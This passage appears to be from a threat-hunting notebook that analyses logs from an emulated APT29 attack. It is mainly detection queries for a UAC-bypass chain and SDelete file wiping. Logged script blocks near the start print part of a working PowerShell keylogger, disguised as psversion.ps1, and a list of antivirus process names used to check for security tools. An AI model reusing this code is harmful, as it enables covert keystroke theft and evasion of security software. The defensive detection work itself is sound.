                [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
            $FieldValueArray = [Object[]] @(
                'ToUnicode',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
            $FieldValueArray = [Object[]] @(
                'GetForegroundWindow',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $ImportDll = $TypeBuilder.CreateType()
        }

        $LastWindowTitle = ""
        $i=0
        while ($true) {
            Start-Sleep -Milliseconds 40
            $gotit = ""
            $Outout = ""
            
            for ($char = 1; $char -le 254; $char++) {
                $vkey = $char
                $gotit = $ImportDll::GetAsyncKeyState($vkey)
                
                if ($gotit -eq -32767) {

                    #check for keys not mapped by virtual keyboard
                    $LeftShift    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000
                    $RightShift   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000
                    $LeftCtrl     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000
                    $RightCtrl    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq 0x8000
                    $LeftAlt      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000
                    $RightAlt     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000
                    $TabKey       = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000
                    $SpaceBar     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000
                    $DeleteKey    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000
                    $EnterKey     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000
                    $BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000
                    $LeftArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000
                    $RightArrow   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000
                    $UpArrow      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000
                    $DownArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000
                    $LeftMouse    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000
                    $RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000

                    if ($LeftShift -or $RightShift) {$Outout += '[Shift]'}
                    if ($LeftCtrl  -or $RightCtrl)  {$Outout += '[Ctrl]'}
                    if ($LeftAlt   -or $RightAlt)   {$Outout += '[Alt]'}
                    if ($TabKey)       {$Outout += '[Tab]'}
                    if ($SpaceBar)     {$Outout += '[SpaceBar]'}
                    if ($DeleteKey)    {$Outout += '[Delete]'}
                    if ($EnterKey)     {$Outout += '[Enter]'}
                    if ($BackSpaceKey) {$Outout += '[Backspace]'}
                    if ($LeftArrow)    {$Outout += '[Left Arrow]'}
                    if ($RightArrow)   {$Outout += '[Right Arrow]'}
                    if ($UpArrow)      {$Outout += '[Up Arrow]'}
                    if ($DownArrow)    {$Outout += '[Down Arrow]'}
                    if ($LeftMouse)    {$Outout += '[Left Mouse]'}
                    if ($RightMouse)   {$Outout += '[Right Mouse]'}

                    #check for capslock
                    if ([Console]::CapsLock) {$Outout += '[Caps Lock]'}

                    $scancode = $ImportDll::MapVirtualKey($vkey, 0x3)
                    
                    $kbstate = New-Object Byte[] 256
                    $checkkbstate = $ImportDll::GetKeyboardState($kbstate)
                    
                    $mychar = New-Object -TypeName "System.Text.StringBuilder";
                    $unicode_res = $ImportDll::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)

                    #get the title of the foreground window
                    $TopWindow = $ImportDll::GetForegroundWindow()
                    $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
                    
                    if ($unicode_res -gt 0) {
                        if ($WindowTitle -ne $LastWindowTitle){
                            # if the window has changed
                            $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
                            $Outout = "`n`n$WindowTitle - $TimeStamp`n"
                            $LastWindowTitle = $WindowTitle
                        }
                        $Outout += $mychar.ToString()
                        $Outout
                    }
                }
            }
        }
    }
}

ScriptBlock ID: fa9f2b3a-3f5e-4d3c-93c9-7172cc073add
Path: C:\Program Files\SysinternalsSuite\psversion.ps1 
-RECORD 2-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Keystroke-Check {
    Get-Process | Where-Object { $_.ProcessName -Eq "avp" -or $_.ProcessName -Eq "acs" -or $_.ProcessName -Eq "outpost" -or $_.ProcessName -Eq "mcvsescn" -or $_.ProcessName -Eq "mcods" -or $_.ProcessName -Eq "navapsvc" -or $_.ProcessName -Eq "kav" -or $_.ProcessName -Eq "AvastSvc" -or $_.ProcessName -Eq "AvastUi" -or $_.ProcessName -Eq "nod32krn" -or $_.ProcessName -Eq "nod32" -or $_.ProcessName -Eq "ekern" -or $_.ProcessName -Eq "dwengine" -or $_.ProcessName -Eq "MsMpEng" -or $_.ProcessName -Eq "msseces" -or $_.ProcessName -Eq "ekrn" -or $_.ProcessName -Eq "savservice" -or $_.ProcessName -Eq "scfservice" -or $_.ProcessName -Eq "savadminservice" }
}

ScriptBlock ID: a2a6be75-3568-4d81-a0ca-40a31de44589
Path: C:\Program Files\SysinternalsSuite\psversion.ps1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
-RECORD 3-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
get-process

ScriptBlock ID: 66a7f650-8a84-4dcf-a0f7-41d06de51f5c
Path:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       

4.B.2. File Deletion

Procedure: Deleted rcs.3aka3.doc on disk using SDelete

Criteria: sdelete64.exe deleting the file rcs.3aka3.doc

Detection Type: Telemetry (Correlated)

Query ID: 5EED5350-0BFD-4501-8B2D-4CE4F8F9E948

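# Walk the process-creation chain down to the SDelete invocation, matching
# only when every link is present in the Sysmon data:
#   sdclt.exe -> control.exe -> High-integrity process -> powershell.exe
#   -> sdelete*.exe whose command line mentions "3aka3"
# Each nested subquery filters on Sysmon EventID 1 (process creation) and
# links child to parent with ParentProcessGuid = ProcessGuid. The chain is
# presumably the UAC-bypass step from the earlier sub-step — confirm against
# that section before reusing this query elsewhere.
# NOTE(review): the '%3aka3%' command-line filter pins the query to this
# evaluation's file name (rcs.3aka3.doc); a general hunt for SDelete use
# would drop it and alert on the chain alone.
df = spark.sql(
'''
SELECT f.ProcessGuid
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessId, d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid = c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      -- LOWER() keeps this comparison case-insensitive like every other
      -- Image/ParentImage match in the chain; the original compared raw.
      AND LOWER(d.Image) LIKE '%powershell.exe'
) e
ON f.ParentProcessGuid = e.ProcessGuid
WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND f.EventID = 1
    AND LOWER(f.Image) LIKE '%sdelete%'
    AND LOWER(f.CommandLine) LIKE '%3aka3%'

'''
)
# Vertical, untruncated output so long GUID/path columns stay readable.
df.show(100, truncate=False, vertical=True)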
-RECORD 0---------------------------------------------
 ProcessGuid | {47ab858c-e2ac-5eac-cb03-000000000400} 

Query ID: 59A9AC92-124D-4C4B-A6BF-3121C98677C3

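# Same process chain as the previous query (sdclt.exe -> control.exe ->
# High-integrity process -> powershell.exe -> sdelete*.exe with "3aka3" in
# its command line), but instead of returning the SDelete ProcessGuid it
# joins that GUID back to Sysmon registry events (EventID 12 and 13) whose
# TargetObject falls under ...\Software\Sysinternals\SDelete. The record
# shown below is the EulaAccepted value SDelete sets on first run, which is
# a useful secondary indicator that the tool actually executed.
# NOTE(review): as before, the '%3aka3%' filter is evaluation-specific;
# the registry match alone is the reusable part of this query.
df = spark.sql(
'''
SELECT Message
FROM apt29Host h
INNER JOIN (
    SELECT f.ProcessGuid
    FROM apt29Host f
    INNER JOIN (
      SELECT d.ProcessId, d.ProcessGuid
      FROM apt29Host d
      INNER JOIN (
        SELECT a.ProcessGuid, a.ParentProcessGuid
        FROM apt29Host a
        INNER JOIN (
          SELECT ProcessGuid
          FROM apt29Host
          WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
              AND EventID = 1
              AND LOWER(Image) LIKE "%control.exe"
              AND LOWER(ParentImage) LIKE "%sdclt.exe"
        ) b
        ON a.ParentProcessGuid = b.ProcessGuid
        WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
          AND a.EventID = 1
          AND a.IntegrityLevel = "High"
      ) c
      ON d.ParentProcessGuid = c.ProcessGuid
      WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND d.EventID = 1
        -- LOWER() keeps this comparison case-insensitive like every other
        -- Image/ParentImage match in the chain; the original compared raw.
        AND LOWER(d.Image) LIKE '%powershell.exe'
    ) e
    ON f.ParentProcessGuid = e.ProcessGuid
    WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND f.EventID = 1
      AND LOWER(f.Image) LIKE '%sdelete%'
      AND LOWER(f.CommandLine) LIKE '%3aka3%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND h.EventID in (12,13)
    -- Backslashes are escaped once for Python and once for the Spark SQL
    -- string literal so the regex sees a single literal "\" per separator;
    -- presumably why there are eight per path component — verify if the
    -- session's escape settings change.
    AND LOWER(h.TargetObject) RLIKE '.*\\\\\\\\software\\\\\\\\sysinternals\\\\\\\\sdelete.*'

'''
)
# Vertical, untruncated output so the full Message text is visible.
df.show(100, truncate=False, vertical=True)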
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:02:04.518
ProcessGuid: {47ab858c-e2ac-5eac-cb03-000000000400}
ProcessId: 4140
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete\EulaAccepted
Details: DWORD (0x00000001) 
-RECORD 1-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:02:04.518
ProcessGuid: {47ab858c-e2ac-5eac-cb03-000000000400}
ProcessId: 4140
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete                            
-RECORD 2-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:02:04.518
ProcessGuid: {47ab858c-e2ac-5eac-cb03-000000000400}
ProcessId: 4140
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete                            

Query ID:3A1DC1C2-B640-4FCE-A71F-2F65AB060A8C

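# 4.B.2 (Security log): the same SDelete process chain rebuilt from Windows Security
# EventID 4688 (process creation) instead of Sysmon. 4688 has no ProcessGuid, so each hop
# joins the child's creator ProcessId to the parent's NewProcessId:
#   b: control.exe whose parent process is sdclt.exe
#   a: child of b with MandatoryLabel S-1-16-12288 (High) and TokenElevationType %%1937
#      (the "Type 2" elevated token described in the event text)
#   d: powershell.exe child of a
#   f: child of d named *sdelete* with "3aka3" on the command line
# Channel is compared lower-cased because the Security channel name is not consistently
# cased across sources; every process-name / command-line LIKE is wrapped in LOWER() for the
# same reason (Spark SQL LIKE is case-sensitive), including the powershell.exe hop.
query = '''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND LOWER(d.NewProcessName) LIKE '%powershell.exe'
) e
ON f.ProcessId = e.NewProcessId
WHERE LOWER(f.Channel) = "security"
  AND f.EventID = 4688
  AND LOWER(f.NewProcessName) LIKE '%sdelete%'
  AND LOWER(f.CommandLine) LIKE '%3aka3%'

'''
# `spark` is the notebook-provided SparkSession; `df` is reused by the cells that follow.
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)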
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x102c
	New Process Name:	C:\Program Files\SysinternalsSuite\sdelete64.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0xf24
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Program Files\SysinternalsSuite\sdelete64.exe" /accepteula C:\programdata\victim\???cod.3aka3.scr

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

4.B.3. File Deletion

Procedure: Deleted Draft.zip on disk using SDelete

Criteria: sdelete64.exe deleting the file draft.zip

Detection Type: Telemetry (Correlated)

Query ID:02D0BBFB-4BDF-4167-B530-253779745EF7

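# 4.B.3 (Sysmon file delete): return the Sysmon EventID 23 (FileDelete) events, together with
# the deleting process's command line, for the SDelete process that referenced draft.zip.
# Subquery g reconstructs the process chain from Sysmon EventID 1 rows, innermost first:
#   b: control.exe whose parent image is sdclt.exe
#   a: child of b created at IntegrityLevel = "High"
#   d: powershell.exe child of a
#   f: child of d whose Image contains "sdelete" and whose CommandLine contains "draft.zip"
# The outer query joins g.ProcessGuid to the FileDelete events of that same process.
# Spark SQL LIKE is case-sensitive, so each Image/CommandLine match is lower-cased first; the
# powershell.exe hop is wrapped in LOWER() like the rest of the chain.
query = '''
SELECT Message, g.CommandLine
FROM apt29Host h
INNER JOIN (
  SELECT f.ProcessGuid, f.CommandLine
  FROM apt29Host f
  INNER JOIN (
    SELECT d.ProcessId, d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND LOWER(d.Image) LIKE '%powershell.exe'
  ) e
  ON f.ParentProcessGuid = e.ProcessGuid
  WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND f.EventID = 1
    AND LOWER(f.Image) LIKE '%sdelete%'
    AND LOWER(f.CommandLine) LIKE '%draft.zip%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND h.EventID = 23

'''
# `spark` is the notebook-provided SparkSession; `df` is reused by the cells that follow.
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)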
-RECORD 0--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message     | File Delete:
RuleName: -
UtcTime: 2020-05-02 03:03:14.765
ProcessGuid: {47ab858c-e2f2-5eac-d203-000000000400}
ProcessId: 8760
User: DMEVALS\pbeesly
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetFilename: C:\Users\pbeesly\ZZZZZZZZZZZZZZZZZZZZZ.ZZZ
Hashes: SHA1=B639091A8FA004CAA8E2D95DF4476374D7D09221,MD5=160FF0AB6AADF8ECD579C7667E4B2248,SHA256=EE85EAC531896E2203E33242A698EDB91305A6C124A98DF81F5FFF0341220150,IMPHASH=00000000000000000000000000000000
IsExecutable: false
Archived: true 
 CommandLine | "C:\Program Files\SysinternalsSuite\sdelete64.exe" /accepteula C:\Users\pbeesly\AppData\Roaming\Draft.Zip                                                                                                                                                                                                                                                                                                                                                                                                                       

Query ID:719618E8-9EE7-4693-937E-1FD39228DEBC

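# 4.B.3 (Sysmon registry): registry events (EventID 12 = key create/delete, EventID 13 =
# value set) written by the SDelete process that referenced draft.zip. Subquery g is the
# same Sysmon EventID 1 process chain as the previous cell (sdclt.exe -> control.exe ->
# High-integrity child -> powershell.exe -> sdelete with "draft.zip" on the command line);
# the outer query joins its ProcessGuid to registry events whose TargetObject matches
# ...\software\sysinternals\sdelete (RLIKE on the lower-cased path).
# Backslashes in the pattern are doubled twice — once for the Python string, once for Spark's
# string parsing — so the regex engine receives "\\", an escaped literal backslash.
# LOWER() wraps every LIKE/RLIKE operand because Spark SQL matching is case-sensitive; the
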